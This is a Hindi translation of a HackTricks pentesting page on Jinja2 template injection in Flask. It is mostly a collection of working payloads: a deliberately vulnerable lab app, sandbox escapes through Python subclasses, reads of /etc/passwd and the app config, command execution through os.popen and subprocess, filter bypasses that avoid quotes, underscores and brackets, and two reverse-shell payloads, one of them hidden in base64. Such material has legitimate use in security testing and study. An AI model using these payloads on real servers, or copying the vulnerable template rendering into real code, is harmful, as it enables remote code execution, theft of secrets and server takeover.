अपने हैकिंग ट्रिक्स साझा करें, HackTricks को PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।
लैब
from flask import Flask, request, render_template_stringapp =Flask(__name__)@app.route("/")defhome():if request.args.get('c'):returnrender_template_string(request.args.get('c'))else:return"Hello, send someting inside the param 'c'!"if__name__=="__main__":app.run()
विविध
डीबग स्टेटमेंट
यदि डीबग एक्सटेंशन सक्षम है, तो debug टैग उपलब्ध होगा जो वर्तमान संदर्भ को डंप करने के साथ ही उपलब्ध फ़िल्टर और टेस्ट दिखाएगा। यह टेम्प्लेट में क्या उपयोग करने के लिए उपलब्ध है, उसे डिबगर सेट किए बिना देखने के लिए उपयोगी है।
<pre>{% debug %}</pre>
सभी कॉन्फ़िग वेरिएबल को डंप करें
{{ config }}#In these object you can find all the configured env variables{%for key, value in config.items()%}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
जिंजा इंजेक्शन
सबसे पहले, जिंजा इंजेक्शन में आपको सैंडबॉक्स से बाहर निकलने का एक तरीका खोजना होगा और सामान्य पायथन निष्पादन फ्लो तक पहुंचना होगा। इसे करने के लिए, आपको उन ऑब्जेक्ट्स का दुरुपयोग करना होगा जो सैंडबॉक्स से नहीं हैं लेकिन सैंडबॉक्स से पहुंचने योग्य हैं।
ग्लोबल ऑब्ज
[]
''
()
dict
config
request
वसूलना <class 'object'>
फिर, इन ऑब्जेक्ट्स से हमें क्लास: <class 'object'> तक पहुंचना होगा ताकि हम परिभाषित किए गए क्लासेस को वापस प्राप्त कर सकें। इसलिए इस ऑब्ज
# To access a class object[].__class__''.__class__()["__class__"] # You can also access attributes like thisrequest["__class__"]config.__class__dict#It's already a class# From a class to access the class "object".## "dict" used as example from the previous list:dict.__base__dict["__base__"]dict.mro()[-1]dict.__mro__[-1](dict|attr("__mro__"))[-1](dict|attr("\x5f\x5fmro\x5f\x5f"))[-1]# From the "object" class call __subclasses__(){{dict.__base__.__subclasses__()}}{{dict.mro()[-1].__subclasses__()}}{{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))()}}{%with a = dict.mro()[-1].__subclasses__()%}{{ a }}{% endwith %}# Other examples using these ways{{ ().__class__.__base__.__subclasses__()}}{{ [].__class__.__mro__[-1].__subclasses__()}}{{ ((""|attr("__class__")|attr("__mro__"))[-1]|attr("__subclasses__"))()}}{{ request.__class__.mro()[-1].__subclasses__()}}{%with a = config.__class__.mro()[-1].__subclasses__()%}{{ a }}{% endwith %}# Not sure if this will work, but I saw it somewhere{{ [].class.base.subclasses()}}{{''.class.mro()[1].subclasses()}}
RCE Escaping
जब हमने<class 'object'>को पुनः प्राप्त किया और __subclasses__ को कॉल किया है, तो अब हम उन कक्षाओं का उपयोग करके फ़ाइलें पढ़ने और लिखने और कोड को निष्पादित करने के लिए उनका उपयोग कर सकते हैं।
__subclasses__ को कॉल करने ने हमें सैकड़ों नए फ़ंक्शनों तक पहुँचने का मौका दिया है, हम केवल फ़ाइल कक्षा तक पहुँचकर फ़ाइलें पढ़ने/लिखने या किसी ऐसी कक्षा तक पहुँचकर खुलासा कर सकते हैं जिसके पास किसी कक्षा तक पहुँचने की अनुमति है जो कमांड्स को निष्पादित करने की अनुमति देती है (जैसे os।)
दूरस्थ फ़ाइल पढ़ें/लिखें
# ''.__class__.__mro__[1].__subclasses__()[40] = File class{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}{{''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !')}}
आरसीई
# The class 396 is the class <class 'subprocess.Popen'>{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}# Calling os.popen without guessing the index of the class{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
## Passing the cmd line in a GET param{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
अधिक क्लासेस के बारे में जानने के लिए जिन्हें आप इस्तेमाल कर सकते हैं बचने के लिए आप यहाँ जांच कर सकते हैं:
फ़िल्टर बाईपास
सामान्य बाईपास
ये बाईपास हमें यह संभव बनाएंगे कि हम विशेषताएँ का पहुंच प्राप्त कर सकें बिना किसी विशेष वर्णों का उपयोग किए।
हमने पहले ही कुछ इन बाईपासों को पिछले उदाहरणों में देखा है, लेकिन यहाँ हम उन्हें संक्षेपित करेंगे:
# Without quotes, _, [, ]## Basic onesrequest.__class__request["__class__"]request['\x5f\x5fclass\x5f\x5f']request|attr("__class__")request|attr(["_"*2,"class","_"*2]|join) # Join trick## Using request object optionsrequest|attr(request.headers.c) #Send a header like "c: __class__" (any trick using get params can be used with headers also)
request|attr(request.args.c) #Send a param like "?c=__class__request|attr(request.query_string[2:16].decode() #Send a param like "?c=__class__request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join) # Join list to stringhttp://localhost:5000/?c={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ #Formatting the string from get params
## Lists without "[" and "]"http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_# Using with{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
ग्लोबल ऑब्जेक्ट्स से एक और तरीका है RCE तक पहुंचने के लिए उस क्लास का उपयोग न करते हुए।
यदि आप किसी फ़ंक्शन तक पहुंच जाते हैं उन ग्लोबल ऑब्ज
{{ request.__class__.__dict__ }}-application-_load_form_data-on_json_loading_failed{{ config.__class__.__dict__ }}-__init__-from_envvar-from_pyfile-from_object-from_file-from_json-from_mapping-get_namespace-__repr__# You can iterate through children objects to find more
एक बार जब आप कुछ फ़ंक्शन्स खोज लेते हैं, तो आप निम्नलिखित के साथ बिल्टइंस को पुनः प्राप्त कर सकते हैं:
# Read file{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read()}}# RCE{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read()}}{{ config.__class__.from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read()}}{{ (config|attr("__class__")).from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read()}}{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("ls")["read"]() %} {{ a }} {% endwith %}
## Extra## The global from config have a access to a function called import_string## with this function you don't need to access the builtins{{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read()}}# All the bypasses seen in the previous sections are also valid